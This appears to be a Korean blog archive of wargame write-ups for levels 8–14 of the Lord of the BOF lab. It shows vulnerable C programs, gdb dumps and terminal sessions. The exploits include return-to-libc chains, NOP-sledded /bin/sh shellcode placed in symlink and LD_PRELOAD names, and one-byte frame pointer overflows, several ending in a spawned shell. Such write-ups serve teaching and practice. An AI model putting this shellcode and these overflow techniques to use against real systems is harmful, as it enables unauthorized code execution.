0x804856c <main+12>:    push   0x8048700
0x8048571 <main+17>:    call   0x8048444 <printf>
0x8048576 <main+22>:    add    %esp,4
0x8048579 <main+25>:    push   0
0x804857b <main+27>:    call   0x8048474 <exit>
0x8048580 <main+32>:    add    %esp,4
0x8048583 <main+35>:    push   0x804870c
0x8048588 <main+40>:    push   0x8048720
0x804858d <main+45>:    call   0x8048404 <popen>
0x8048592 <main+50>:    add    %esp,8
0x8048595 <main+53>:    mov    %eax,%eax
0x8048597 <main+55>:    mov    DWORD PTR [%ebp-44],%eax
0x804859a <main+58>:    mov    %eax,DWORD PTR [%ebp-44]
0x804859d <main+61>:    push   %eax
0x804859e <main+62>:    push   0xff
0x80485a3 <main+67>:    lea    %eax,[%ebp-40]
0x80485a6 <main+70>:    push   %eax
0x80485a7 <main+71>:    call   0x8048424 <fgets>
0x80485ac <main+76>:    add    %esp,12
0x80485af <main+79>:    lea    %eax,[%ebp-48]
0x80485b2 <main+82>:    push   %eax
0x80485b3 <main+83>:    push   0x804876b
0x80485b8 <main+88>:    lea    %eax,[%ebp-40]
0x80485bb <main+91>:    push   %eax
0x80485bc <main+92>:    call   0x8048484 <sscanf>
0x80485c1 <main+97>:    add    %esp,12
0x80485c4 <main+100>:   mov    %eax,DWORD PTR [%ebp-44]
0x80485c7 <main+103>:   push   %eax
0x80485c8 <main+104>:   call   0x8048464 <fclose>
0x80485cd <main+109>:   add    %esp,4
0x80485d0 <main+112>:   push   0x804870c
0x80485d5 <main+117>:   push   0x8048780
0x80485da <main+122>:   call   0x8048404 <popen>
0x80485df <main+127>:   add    %esp,8
0x80485e2 <main+130>:   mov    %eax,%eax
0x80485e4 <main+132>:   mov    DWORD PTR [%ebp-44],%eax
0x80485e7 <main+135>:   mov    %eax,DWORD PTR [%ebp-44]
0x80485ea <main+138>:   push   %eax
0x80485eb <main+139>:   push   0xff
0x80485f0 <main+144>:   lea    %eax,[%ebp-40]
0x80485f3 <main+147>:   push   %eax
0x80485f4 <main+148>:   call   0x8048424 <fgets>
0x80485f9 <main+153>:   add    %esp,12
0x80485fc <main+156>:   lea    %eax,[%ebp-52]
0x80485ff <main+159>:   push   %eax
0x8048600 <main+160>:   push   0x80487c8
0x8048605 <main+165>:   lea    %eax,[%ebp-40]
0x8048608 <main+168>:   push   %eax
0x8048609 <main+169>:   call   0x8048484 <sscanf>
0x804860e <main+174>:   add    %esp,12
0x8048611 <main+177>:   mov    %eax,DWORD PTR [%ebp-44]
0x8048614 <main+180>:   push   %eax
0x8048615 <main+181>:   call   0x8048464 <fclose>
0x804861a <main+186>:   add    %esp,4
0x804861d <main+189>:   mov    %eax,DWORD PTR [%ebp-48]
---Type <return> to continue, or q <return> to quit---
0x8048620 <main+192>:   mov    %edx,DWORD PTR [%ebp-52]
0x8048623 <main+195>:   lea    %ecx,[%edx+%eax*1]
0x8048626 <main+198>:   mov    DWORD PTR [%ebp-56],%ecx
0x8048629 <main+201>:   push   4
0x804862b <main+203>:   mov    %eax,DWORD PTR [%ebp+12]
0x804862e <main+206>:   add    %eax,4
0x8048631 <main+209>:   mov    %edx,DWORD PTR [%eax]
0x8048633 <main+211>:   add    %edx,44
0x8048636 <main+214>:   push   %edx
0x8048637 <main+215>:   lea    %eax,[%ebp-60]
0x804863a <main+218>:   push   %eax
0x804863b <main+219>:   call   0x8048454 <memcpy>
0x8048640 <main+224>:   add    %esp,12
0x8048643 <main+227>:   mov    %eax,DWORD PTR [%ebp-60]
0x8048646 <main+230>:   cmp    %eax,DWORD PTR [%ebp-56]
0x8048649 <main+233>:   je     0x8048662 <main+258>
0x804864b <main+235>:   push   0x80487cb
0x8048650 <main+240>:   call   0x8048444 <printf>
0x8048655 <main+245>:   add    %esp,4
0x8048658 <main+248>:   push   0
0x804865a <main+250>:   call   0x8048474 <exit>
0x804865f <main+255>:   add    %esp,4
0x8048662 <main+258>:   mov    %eax,DWORD PTR [%ebp+12]
0x8048665 <main+261>:   add    %eax,4
0x8048668 <main+264>:   mov    %edx,DWORD PTR [%eax]
0x804866a <main+266>:   push   %edx
0x804866b <main+267>:   lea    %eax,[%ebp-40]
0x804866e <main+270>:   push   %eax
0x804866f <main+271>:   call   0x8048494 <strcpy>
0x8048674 <main+276>:   add    %esp,8
0x8048677 <main+279>:   lea    %eax,[%ebp-40]
0x804867a <main+282>:   push   %eax
0x804867b <main+283>:   push   0x80487e1
0x8048680 <main+288>:   call   0x8048444 <printf>
0x8048685 <main+293>:   add    %esp,8
0x8048688 <main+296>:   leave
0x8048689 <main+297>:   ret
0x804868a <main+298>:   nop
0x804868b <main+299>:   nop
0x804868c <main+300>:   nop
0x804868d <main+301>:   nop
0x804868e <main+302>:   nop
0x804868f <main+303>:   nop
End of assembler dump.
(gdb) r "`python -c 'print "a"*48'`"
Starting program: /home/bugbear/jiant "`python -c 'print "a"*48'`"
ldd: /home/giant/assassin: No such file or directory
You must use execve!

Program exited normally.
(gdb) b*main+6
Breakpoint 1 at 0x8048566
(gdb) r "`python -c 'print "a"*48'`"
Starting program: /home/bugbear/jiant "`python -c 'print "a"*48'`"

Breakpoint 1, 0x8048566 in main ()
(gdb) x/100s 0xbfffffff-100
0xbfffff9b:      ";35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffe8:      "/home/bugbear/jiant"
0xbffffffc:      ""
0xbffffffd:      ""
0xbffffffe:      ""
0xbfffffff:      ""
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
(gdb) x/12x 0xbfffff9b
0xbfffff9b:     0x3a35333b      0x69672e2a      0x31303d66      0x3a35333b
0xbfffffab:     0x6d622e2a      0x31303d70      0x3a35333b      0x62782e2a
0xbfffffbb:     0x31303d6d      0x3a35333b      0x70782e2a      0x31303d6d
(gdb)
[1]+  Stopped                 gdb -q jiant
[bugbear@localhost bugbear]$ clear
[bugbear@localhost bugbear]$ ls
giant  giant.c  jiant
[bugbear@localhost bugbear]$ nl giant.c
     1  /*
     2          The Lord of the BOF : The Fellowship of the BOF
     3          - giant
     4          - RTL2
     5  */

     6  #include <stdio.h>
     7  #include <stdlib.h>
     8  #include <unistd.h>

     9  main(int argc, char *argv[])
    10  {
    11          char buffer[40];
    12          FILE *fp;
    13          char *lib_addr, *execve_offset, *execve_addr;
    14          char *ret;

    15          if(argc < 2){
    16                  printf("argv error\n");
    17                  exit(0);
    18          }

    19          // gain address of execve
    20          fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
    21          fgets(buffer, 255, fp);
    22          sscanf(buffer, "(%x)", &lib_addr);
    23          fclose(fp);

    24          fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
    25          fgets(buffer, 255, fp);
    26          sscanf(buffer, "%x", &execve_offset);
    27          fclose(fp);

    28          execve_addr = lib_addr + (int)execve_offset;
    29          // end

    30          memcpy(&ret, &(argv[1][44]), 4);
    31          if(ret != execve_addr)
    32          {
    33                  printf("You must use execve!\n");
    34                  exit(0);
    35          }

    36          strcpy(buffer, argv[1]);
    37          printf("%s\n", buffer);
    38  }
[bugbear@localhost bugbear]$ gdb -q jiant
(gdb) b*main
Breakpoint 1 at 0x8048560
(gdb) r
Starting program: /home/bugbear/jiant

Breakpoint 1, 0x8048560 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) p exit
$2 = {void (int)} 0x400391e0 <exit>
(gdb) p execve
$3 = {<text variable, no debug info>} 0x400a9d48 <__execve>
(gdb)
[2]+  Stopped                 gdb -q jiant
[bugbear@localhost bugbear]$ vi getaddr.c
[bugbear@localhost bugbear]$ ls
getaddr.c  giant  giant.c  jiant
[bugbear@localhost bugbear]$ gcc -o getaddr getaddr.c
[bugbear@localhost bugbear]$ ls
getaddr  getaddr.c  giant  giant.c  jiant
[bugbear@localhost bugbear]$ nl getaddr.c
     1  #include <stdio.h>
     2  #include <string.h>
     3  int main(){
     4          long system = 0x00000000;
     5          while (memcmp((void*)system, "/bin/sh\x00", 8)){
     6                  system++;
     7          }
     8          printf("/bin/sh: %x\n", system);
     9          return 0;
    10  }
[bugbear@localhost bugbear]$ vi getaddr.c
[bugbear@localhost bugbear]$ rm getaddr
[bugbear@localhost bugbear]$ gcc -o getaddr getaddr.c
[bugbear@localhost bugbear]$ nl getaddr.c
     1  #include <stdio.h>
     2  #include <string.h>
     3  int main(){
     4          long system = 0x40058ae0;
     5          while (memcmp((void*)system, "/bin/sh\x00", 8)){
     6                  system++;
     7          }
     8          printf("/bin/sh: %x\n", system);
     9          return 0;
    10  }
[bugbear@localhost bugbear]$ ./getaddr
/bin/sh: 400fbff9
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@
[bugbear@localhost bugbear]$ bash2
[bugbear@localhost bugbear]$ gdb -q jiant
(gdb) b*main
Breakpoint 1 at 0x8048560
(gdb) r
Starting program: /home/bugbear/jiant

Breakpoint 1, 0x8048560 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) p exit
$2 = {void (int)} 0x400391e0 <exit>
(gdb) p execve
$3 = {<text variable, no debug info>} 0x400a9d48 <__execve>
(gdb)
[1]+  Stopped                 gdb -q jiant
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@
sh: : command not found
[bugbear@localhost bugbear]$ ./getaddr
/bin/sh: 400fbff9
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@▒@
bash$ my-pass
euid = 514
one step closer
bash$

쉘코드 없이 따는과정이 너무 흥미롭구만

파이썬 코드안에 ""은 \x0a 인식을 위해서임

728x90

'pwnable > LOB' 카테고리의 다른 글

LOB 13번 (0)	2020.08.23
LOB 15번 (0)	2020.08.02
LOB 12번 (0)	2020.08.01
LOB 11번 (0)	2020.07.26
LOB 10번 (0)	2020.07.26

LOB 12번

2020. 8. 1. 21:49

728x90

/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkknight
        - FPO
*/

#include <stdio.h>
#include <stdlib.h>

void problem_child(char *src)
{
        char buffer[40];
        strncpy(buffer, src, 41);
        printf("%s\n", buffer);
}

main(int argc, char *argv[])
{
        if(argc<2){
                printf("argv error\n");
                exit(0);
        }

        problem_child(argv[1]);
}

이 문제는 FPO라는 기법을 알아야하는데, 난 아직 설명을 할 만큼 제대로 알지 못하기에 다른 블로그 글을 첨부한다.

https://dokhakdubini.tistory.com/228

[Stack] Frame Pointer Overflow, FPO에 대하여

오늘은 FPO, Frame Pointer Overflow에 대해서 알아볼 것입니다. SFP Overflow라고도 불립니다. FPO에 대한 풀이 글들을 보면 계속 leave가 ebp+4에 접근할 수 있다, sfp를 조작했으니 ebp를 조작할 수 있다이런..

dokhakdubini.tistory.com

한번에 이해하더라도 나중에 다시 보면서 곱씹어야할듯

일단 단순하게 말하면, 1바이트가 넘치니깐 그걸 buffer시작주소-4의 마지막 바이트를 넣어주면 된다.

왜 그렇냐? 위에 첨부한 글을 한 3번 정독하면 이해가 될 수도 있다.(난 이해했다 싶어도 다음날 다시보면 아리쏭하더라)

스택이 어떻게 쌓이는지는 아니깐, problem_child에 leave부분에 중단점 설정하고 코드를 넣어보면,

buffer의 시작주소는 bffff9e4이다.

밑에 x/12x $esp-8 부분을 보면, 마지막 바이트가 \x00 인것만 확인하면 끝

이 아니라 argv[2]부분의 주소도 알아내야한다. (그래야 거기로 보내지)

nop슬라이드를 태워서 보냈으니깐, 90부분 아무거나 잡자(쉘코드 앞쪽)

728x90

'pwnable > LOB' 카테고리의 다른 글

LOB 15번 (0)	2020.08.02
LOB 14번 (0)	2020.08.01
LOB 11번 (0)	2020.07.26
LOB 10번 (0)	2020.07.26
LOB 9번 (0)	2020.07.25

LOB 11번

2020. 7. 26. 20:08

728x90

/*
        The Lord of the BOF : The Fellowship of the BOF
        - golem
        - stack destroyer
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // stack destroyer!
        memset(buffer, 0, 44);
        memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
}

bash2를 넣고 시작하자 제발

코드를 보니깐, stack destroyer이라는 함수가 추가된것 같다.

memset 함수를 보면, buffer를 0으로 44번째까지 초기화한다. 마지막 4바이트는 남아있는듯.

마지막 남은 4바이트 이후로도 모두 날라가는걸 보아하니 이 문제는 환경변수를 쓰면 될 듯.

여기서 그냥 EGG를 사용하는게 아니라 따로 공유 라이브러리를 사용해야 한다.

vi로 아무 코드나 만든 뒤

gcc -fPIC --shared -o `python -c 'print '\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "\x90"*100'`

이렇게 해주면 공유 폴더가 만들어지고,

LD_PRELOAD를 이용하려면, (LOB에선 LD_PRELOAD 후킹만 금지되어있다)

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/skeleton/

를 넣어줘야한다.

export LD_PRELOAD=/home/skeleton/`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "\x90"*100'`

이렇게 해주고 env를 쳐서 제대로 들어갔는지 확인해본다.

아마 잘 안됬으면 명령어가 들어가지도 않을것이다.

이제 이 환경변수의 주소를 찾기위해 golem파일을 gorem파일로 복사하여(c파일을 복사하여 컴파일)

gorem파일을 실행시켜서 core을 gdb를 해준다.

내 환경에서는 $ESP-1400 에서 주소가 잡혔다.

파란색 부분을 보면 90으로 감싸져있고, 이게 쉘코드다.

그러면 시작부분인 0xbfffff4c8부분을 주소로 잡으면 풀린다.

728x90

'pwnable > LOB' 카테고리의 다른 글

LOB 14번 (0)	2020.08.01
LOB 12번 (0)	2020.08.01
LOB 10번 (0)	2020.07.26
LOB 9번 (0)	2020.07.25
LOB 8번 (0)	2020.07.25

LOB 10번

2020. 7. 26. 17:18

728x90

/*
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // argc saver
        saved_argc = argc;

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // ultra argv hunter!
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i]));
}

코드를 살펴보면, egghunter, bufferhunter, ultra argv hunter, \xbf 정도가 있고,

추가된 것은 ultra ~ 인것 같은디 딱히 어려워 보이진 않는다.

argv[1]은 48자가 최대고, buffer 와 argv모두 0으로 초기화되므로 풀 방법이 생각나질 않는다.

일단 disas, b걸어서 혹시라도 남아있는 값이 있는지 확인해보자.

break를 leave쪽에다가 걸어주고, esp를 살펴보다가,

찾았다 요놈

근데 솔직히 argv[0] 쪽 데이터가 남는다는 사실을 모른다고 가정하고 이 문제를 풀면 진짜 산으로 갈 것 같다.

쨋든 0xbfffffe5 주소에 실행파일의 경로가 남아있으므로, 심볼릭 링크를 생성해주면 간단히(?) 해결될 것 같다.

아 맞다 bash2

0xbfffffe8,

같네

페이로드를 작성하니깐 seg에러가 떠서, 선배한테 질문하니깐 파일 이름이 달라서(길이) 주소가 달라질수도 있다고 한다.

그러면 주소를 다시 구해보자.

복사한 ckeleton 파일의 이름을 수정한 뒤 코어에서 주소를 찾아보면

여기 있고

이렇게 풀린다.

728x90

'pwnable > LOB' 카테고리의 다른 글

LOB 12번 (0)	2020.08.01
LOB 11번 (0)	2020.07.26
LOB 9번 (0)	2020.07.25
LOB 8번 (0)	2020.07.25
LOB 7번 (0)	2020.07.25

LOB 9번

2020. 7. 25. 20:00

728x90

/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

보아하니 주소 옵션에 46번째에 \xff 가 올 수 없다.

그러면 bash2도 할 필요가 없겠군

 1  /*
     2          The Lord of the BOF : The Fellowship of the BOF
     3          - vampire
     4          - check 0xbfff
     5  */

     6  #include <stdio.h>
     7  #include <stdlib.h>

     8  main(int argc, char *argv[])
     9  {
    10          char buffer[40];

    11          if(argc < 2){
    12                  printf("argv error\n");
    13                  exit(0);
    14          }

    15          if(argv[1][47] != '\xbf')
    16          {
    17                  printf("stack is still your friend.\n");
    18                  exit(0);
    19          }

    20          // here is changed!
    21          if(argv[1][46] == '\xff')
    22          {
    23                  printf("but it's not forever\n");
    24                  exit(0);
    25          }
    26
    27          strcpy(buffer, argv[1]);
    28          printf("%x\n", buffer);
    29          printf("%x\n", argv[2]);
    30          printf("%s\n", buffer);
    31  }

다음은 vampire.c 를 bampire.c 로 복사하여 수정한 코드고, buffer 와 argv[2]주소를 읽어오게 하였다.

생각을 해보면, buffer주소를 변하게 하는것보단 인자를 많이 넣어서 argv[2]의 주소를 변화시키는게 좋을것 같다.

이제 46번째 값이 fe이므로 해결된듯

비교적 간단했던 문제

728x90

'pwnable > LOB' 카테고리의 다른 글

LOB 11번 (0)	2020.07.26
LOB 10번 (0)	2020.07.26
LOB 8번 (0)	2020.07.25
LOB 7번 (0)	2020.07.25
LOB 6번 (0)	2020.07.25

LOB 8번

2020. 7. 25. 10:32

728x90

/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        // here is changed
        if(argc != 2){
                printf("argc must be two!\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // one more!
        memset(argv[1], 0, strlen(argv[1]));
}

egghunter, bufferhunter, argv[1]hunter, \xbf, argc는 반드시 2개

의 조건이 보인다.

argv[0], argv[1] 이 두개를 이용해야하는데, 리턴주소는 argv[1]를 이용할 수 없다. 왜냐? 0으로 초기화되거든

그러면 우리는 argv[0]에다가 shellcode를 넣어줘야 하는데, 우리가 쓰던 기존 shellcode는 사용할 수 없다.

나도 아직 shellcode를 직접 짜보지 않아서.. 자세한 이유는 다음 첨부하는 주소의 글을 참고하길.

https://dokhakdubini.tistory.com/220?category=797537

[해커스쿨 LOB] Level8: Orge >> Troll

Level 8. Orge >> Troll Theme: Check argc + argv hunter 로그인 id : orge pw : timewalker bash2 입력해주시고, 코드를 확인해봅시다. [orge@localhost orge]$ bash2 [orge@localhost orge]$ nl troll.c 1 /*..

dokhakdubini.tistory.com

위 블로그에서 가져온 shell코드는

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

총 35바이트의 코드이고, 심볼릭 링크로 지정 가능하다.

[orge@localhost orge]$ ls
core  troll  troll.c
[orge@localhost orge]$ cp troll.c troop.c
[orge@localhost orge]$ vi troop.c

[1]+  Stopped                 vi troop.c
[orge@localhost orge]$ vi troop.c

[2]+  Stopped                 vi troop.c
[orge@localhost orge]$ vi troop.c
[orge@localhost orge]$ ni troop.c
bash2: ni: command not found
[orge@localhost orge]$ ? 코드를 까먹었다 ㅋ
bash2: ?: command not found
[orge@localhost orge]$ ls
core  troll  troll.c  troop.c
[orge@localhost orge]$ gcc -o troop.c
gcc: No input files
[orge@localhost orge]$ gcc -o troop troop.c
[orge@localhost orge]$ ls
core  troll  troll.c  troop  troop.c
[orge@localhost orge]$ ln -s troop `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ls
core
troll
troll.c
troop
troop.c
????????????????????????????????????????????????????????????????????????????????????????????????????▒?^1ɱ2?l?▒??▒?u▒▒?▒▒▒▒▒2▒Qi00tii0cjo?▒QT?▒?▒?▒?
[orge@localhost orge]$ ./`python -c 'print "\x90"'* `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
>
> ''
> '
> '
>
[orge@localhost orge]$
[orge@localhost orge]$ ./`python -c 'print "\x90"'`* `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
bffffaa2
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒
Segmentation fault (core dumped)
[orge@localhost orge]$ rm `python -c 'print "\x90"'`*
[orge@localhost orge]$ ls
core  troll  troll.c  troop  troop.c
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*100 + "
>
>
>
> '
> ''
> '
> '
> '
>
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ls
core
troll
troll.c
troop
troop.c
????????????????????????????????????????????????????????????????????????????????????????????????????▒?^1ɱ2?l?▒??▒?u▒▒?▒▒▒▒▒2▒Qi00tii0cjo?▒QT?▒?▒?▒?
[orge@localhost orge]$ ./`python -c 'print "\x90"'`* `python -c 'print "A"*44 + "\xa2\xfa\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒
bash$ my-pass
euid = 508
aspirin
bash$

근데 코어로 분석을 안할꺼면 굳이 심볼릭링크에 nop을 넣어줘야 하는지 모르겠다.

728x90

'pwnable > LOB' 카테고리의 다른 글

LOB 10번 (0)	2020.07.26
LOB 9번 (0)	2020.07.25
LOB 7번 (0)	2020.07.25
LOB 6번 (0)	2020.07.25
LOB 5번 (0)	2020.07.22

PREV 1 2 3 4 5 6 NEXT

cm9200

pwnable

LOB 13번

'pwnable > LOB' 카테고리의 다른 글

LOB 15번

'pwnable > LOB' 카테고리의 다른 글

LOB 14번

'pwnable > LOB' 카테고리의 다른 글

LOB 12번

'pwnable > LOB' 카테고리의 다른 글

LOB 11번

